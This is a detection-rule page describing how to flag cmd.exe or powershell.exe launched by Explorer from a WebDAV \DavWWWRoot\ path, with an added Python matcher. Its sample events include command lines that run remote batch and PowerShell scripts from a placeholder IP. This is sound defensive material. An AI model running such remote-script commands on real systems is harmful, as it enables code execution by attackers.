
Summary
The rule "Potentially Suspicious WebDAV LNK Execution" aims to detect potentially malicious activity in which an application is launched by an LNK (shortcut) file accessed through a WebDAV server. This type of attack exploits the mechanism by which Windows resolves and executes link files that point to remote resources. The detection logic targets process creation events where the parent process is Explorer and the child process is an executable that may have been started by a WebDAV-accessed link file. The rule looks for a specific combination of conditions: the parent image must end with \explorer.exe, the invoked image should be a common scripting or command execution utility (such as cmd.exe or powershell.exe), and the command line must reference the WebDAV path structure \DavWWWRoot\. If all three conditions are met, the rule flags the event as potentially suspicious. This helps surface an attack vector that traditional monitoring setups may overlook, since legitimate use of LNK files often goes unchecked, leaving systems exposed.
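The following is an added example, not the rule's own YAML or any code from its authors: a small Python matcher that applies the three conditions described above to Windows process-creation events and runs them over a handful of constructed sample events. It assumes Sysmon-style field names (ParentImage, Image, CommandLine), which are not given on the page, and the set of "command execution utilities" is illustrative, using only the two names the summary mentions.

```python
"""
Added example (not the rule's own code): apply the three conditions from the
"Potentially Suspicious WebDAV LNK Execution" summary to process-creation events.

Assumptions not taken from the page:
  - events are dicts with Sysmon-style keys ParentImage, Image, CommandLine
  - SUSPICIOUS_IMAGES is an illustrative list; the real rule's full list is not shown
  - matching is case-insensitive, as is typical for Windows path comparisons
"""
from typing import Dict, Iterable, List

# Illustrative: the summary names cmd.exe and powershell.exe as examples.
SUSPICIOUS_IMAGES = ("\\cmd.exe", "\\powershell.exe")

# Path component the Windows WebDAV redirector places in UNC paths (from the summary).
WEBDAV_MARKER = "\\davwwwroot\\"


def is_suspicious_webdav_lnk_execution(event: Dict[str, str]) -> bool:
    """Return True when all three conditions of the rule hold for one event."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()

    # Condition 1: the parent is Explorer, the shell that resolves the LNK file.
    if not parent.endswith("\\explorer.exe"):
        return False
    # Condition 2: the child is one of the scripting / command execution utilities.
    if not image.endswith(SUSPICIOUS_IMAGES):
        return False
    # Condition 3: the command line references the WebDAV redirector path.
    return WEBDAV_MARKER in cmdline


def find_matches(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter a stream of process-creation events down to the ones the rule would flag."""
    return [e for e in events if is_suspicious_webdav_lnk_execution(e)]


# Constructed sample events (documentation-range IP 203.0.113.10, invented paths).
SAMPLE_EVENTS = [
    {   # all three conditions hold -> should match
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "\\203.0.113.10@80\DavWWWRoot\share\doc.bat"',
    },
    {   # benign: Explorer launched cmd.exe on a local batch file, no WebDAV path
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "C:\Users\alice\build.bat"',
    },
    {   # WebDAV path present but the parent is not Explorer -> condition 1 fails
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -File "\\203.0.113.10\DavWWWRoot\tools\update.ps1"',
    },
    {   # all three conditions hold with powershell.exe -> should match
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -File "\\203.0.113.10\DavWWWRoot\tools\update.ps1"',
    },
    {   # Explorer opened a file over WebDAV with a viewer, not a command utility -> condition 2 fails
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r'notepad.exe "\\203.0.113.10\DavWWWRoot\share\readme.txt"',
    },
]


if __name__ == "__main__":
    for hit in find_matches(SAMPLE_EVENTS):
        print("ALERT:", hit["Image"], "|", hit["CommandLine"])
```

Of the five constructed events only the first and fourth satisfy all three conditions; the others show the three ways an event falls out of scope (no WebDAV path, a parent other than Explorer, or a child that is not a command utility), which is useful when tuning the rule against your own telemetry.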
Categories
- Windows
Data Sources
- File
- Process
Created: 2023-08-21